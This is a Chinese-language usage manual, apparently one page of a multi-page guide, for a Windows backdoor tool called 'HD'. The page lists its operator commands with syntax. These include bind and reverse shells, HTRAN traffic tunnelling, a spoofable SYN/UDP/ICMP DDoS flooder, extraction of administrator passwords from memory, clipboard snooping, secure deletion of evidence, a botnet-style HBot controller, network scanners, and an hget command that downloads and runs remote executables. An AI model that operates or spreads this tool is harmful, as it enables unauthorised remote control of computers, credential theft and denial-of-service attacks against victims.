强大的后门工具：HD

 

命令解释: 退出后门Shell

e. ID

命令解释: 显示后门ID（）
使用帮助:
1. DoorShell里可以用Config -id <DoorID> 进行配置。
2. CMDShell里可以用hd -c -id <DoorID> 进行配置。

f. KICK

命令解释: 踢掉Shell
帮助信息:
Usage of Kick:  kick <NO|ALL>
参数解释:
1. <No> 为用WHO/ONLINE命令列举出所有Shell的ID条目编号。
2. <All> 为踢掉除当前连接外的所有Shell。

g. NOP/NOOP

命令解释: 空操作，保持连接

h. RELOAD

命令解释: 重新装入配置

i. REMOVE

命令解释: 删除后门

j. SHOW

命令解释: 查看后门配置

k. UPDATE

命令解释: 升级后门
使用帮助:
Usage of Update:    update <URL|LocalFilename> [reinstall]

l. VER/VERSION

命令解释: 显示后门版本信息

m. WHO/ONLINE

命令解释: 查看在线Shell

2. 文件目录操作

a. CD

命令解释: 切换目录
帮助信息:
Usage of CD: cd <Directory>

b. COPY/CP

命令解释: 拷贝文件或目录
帮助信息:
Usage of Copy: copy <FileName> <NewPath>

c. DEL/RM/RD

命令解释: 删除文件或目录
帮助信息:
Usage of Delete: del <FileName|DirectoryName>

d. DIR/LS/LIST

命令解释: 查看文件列表
帮助信息:
Usage of Dir: dir [FileName|DirectoryName]

e. FIND

命令解释: 查找文件
帮助信息:
Usage of Find: find <SearchDir> <FindFileName>

f. MOVE/MV

命令解释: 移动文件或目录
帮助信息:
Usage of Move: move <Path> <NewPath>

g. MD/MKDIR

命令解释: 创建目录
帮助信息:
Usage of Mkdir: mkdir <DirectoryName>

h. PWD

命令解释: 查看当前目录

i. REN/RENNAME

命令解释: 改名文件或者目录
帮助信息:
Usage of Rename: ren <FileName> <NewFileName>

j. SDEL/SAFEDEL

命令解释: 安全删除文件或者目录
帮助信息:
Usage for Safe Delete Files:
safedel [-p passes] [-s] [-q] <File or Directory>
safedel [-p passes] -z [Drive Letter]
[Opation:]
-p passes  Specifies Number of Overwrite Passes (Default:1)
-s         Recurse Subdirectories
-q         Don't print errors (Quiet)
-z         Clean Free Space

k. TYPE/CAT

命令解释: 查看文本文件
帮助信息:
Usage of TypeFile: type <TextFileName>

3. 执行程序操作

a. CMD/DOS/SHELL

命令解释: 切换到cmd shell

b. EXE

命令解释: 用CreateProcess()运行文件，并显示结果。(可以在cmd.exe不存在的时候使用)
帮助信息:
Usage of Exe: exe <File> [Parameter]

c. EXEC

命令解释: 用Winexec()运行文件
帮助信息:
Usage of Exec: exec <File>

d. OPEN

命令解释: 用ShellExecute()运行文件
帮助信息:
Usage of Open: open <File>

e. SYSTEM

命令解释: 用System()运行文件
帮助信息:
Usage of System: system <File>

4. 系统操作

a. DATE

命令解释: 显示系统当前日期和时间

b. LOCK/UNLOCK

命令解释: 锁定/解除锁定鼠标

c. LOGOFF

命令解释: 注销系统

d. REBOOT

命令解释: 重启系统

e. SHUTDOWN

命令解释: 关闭系统

f. SYS/INFO

命令解释: 查看系统信息

5. 后门Shell操作

a. BIND

命令解释: 创建一个bind Shell到指定端口
帮助信息:
Usage of Bind: bind <port>

b. CONNECT
命令解释: 反连一个Shell到指定IP的端口
帮助信息:
Usage of Connect: connect <ip> <port>

c. SERVER
命令解释: 创建一个能多次连接的BindShell到指定端口
帮助信息:
Usage of Server: server <port>

d. TELNET/LOGIN
命令解释: 远程连接，可用于登陆另一个监听Shell
帮助信息:
Usage for Telnet: telnet <Port>

6. 代理操作

a. KILLPROXY/KP

命令解释: 终止代理任务
帮助信息:
Usage of Stop a Proxy: killproxy <NO|ALL>

b. LISTPROXY/LP

命令解释: 列举代理任务

c. PROXY/HTRAN

命令解释: 创建代理任务
帮助信息:
[Usage of Socks5 Proxy:]
htran -bind [RebindIP] [BindPort]              Default:8009
htran -connect ConnectHost [ConnectPort]       Default:80
htran -listen [ConnectPort] [ListenPort]       Default:80 8009

[Usage of Packet Transmit:]
htran -listen2 ConnectPort TransmitPort
htran -tran ConnectPort TransmitHost TransmitPort
htran -slave ConnectHost ConnectPort TransmitHost TransmitPort

7. 拒绝服务攻击操作

a. DDOS/HGOD

命令解释: 创建拒绝服务攻击任务
帮助信息:
[Usage of DDoS Attack:]
ddos <Target> <Port1,Port2,Port3...> [Option]
<Target>       Flooding Host IP|Hostname.
<Port1,...>    Flooding Host Port. Port Num must <10.

[Option:]
-a:AttackTime  The Time(minute) of Attack. Set 0 for Always. Default is 0.
-b:Packsize    The Size of Packet, for UDP/ICMP/IGMP Mode. Default is 1000.
-d:Delay       Delay of Send Packet, for UDP/ICMP/IGMP Mode. Default is 10ms.
-m:Mode        Attack Mode, Use SYN/UDP/ICMP/IGMP. Default is SYN.
-p:SourcePort  Set SourcePort, Default is Random.
-s:SourceIP    Set SourceIP, Default is Random.
-t:Thread      The Threads Num for Flooding, Max is 50, Default is 2.

b. KILLDDOS/KD

命令解释: 终止拒绝服务攻击任务
帮助信息:
Usage of stop a DDoS Attack: killddos <No|ALL>

c. LISTDDOS/LD

命令解释: 列举拒绝服务攻击任务

8. 其他功能操作

a. CLIP

命令解释: 查看剪切板内容

b. FINDPASS

命令解释: 查找内存中的管理员密码

c. FPORT

命令解释: 端口对应进程

d. GET/PUT

命令解释: 上传下载文件（必须使用后门客户端连接才可用）
帮助信息:
get <remotefilename> [localfiename]
put <remotefilename> [localfiename]

e. HASH

命令解释: 产生HBot登陆Hash
帮助信息:
Usage of HBot Hash: hash <HostStrings>

f. HBOT

命令解释: 开始/停止 HBot任务
帮助信息:
Usage of HBot:
hbot -stop
hbot -start [Channel] [Server] [ServerPort] [ChannelPass] [ServerPass]

g. HBS

命令解释: 端口Banner扫描器
帮助信息:
[Usage:]
hbs <StartIP> <EndIP> [Options]

[Options:]
/c             Check Web Version
/n             Note Port Open
/o             Scan Port Only
/w             Scan Web Version Only
/d <Delay>     TCP connect timeout, between 1-20, default is 5
/l <Logfile>   Log file name, default is hbs.txt
/p <Port>      Scan port, default is 25
/s <String>    Scan sensitive string
/t <Thread>    Scan thread number, between 1-1000, default is 200

h. HGET

命令解释: FTP/HTTP文件下载
帮助信息:

Usage of HGet: hget <HTTPFile|FTPFile> <LocalFile> [run]

hget http://www.xxx.com/test.exe test.exe run
hget ftp://user:pass@ftp.xxx.com/test.exe test.exe

i. HMB

命令解释: 域名MX记录SMTP banner扫描器
帮助信息:
Usage of Domain MX Banner: hmb <DomainName|FileName>

j. HSCAN

命令解释: 命令行Ping/Name/SQL/IPC扫描器
帮助信息:
[Usage:]
-hscan <HostName|<StartIP[-EndIP]> [Options]

[Options:]
/c             Check host state, Ping first
/f             Faster Scan
/i             IPC User Scan
/n             Name Scan
/p             Ping Scan
/s             SQL User Scan
/d <Delay>     Set timeout, between 1-20, default is 5
/l <Logfile>   Log file name, default is hscan.txt
/t <Thread>    Scan thread number, between 1-1000, default is 200
注: 服务状态下IPC扫描不能用, 如果需要请用su切换到普通用户模式使用命令行扫描

上一页  [1] [2] [3] [4] [5] 下一页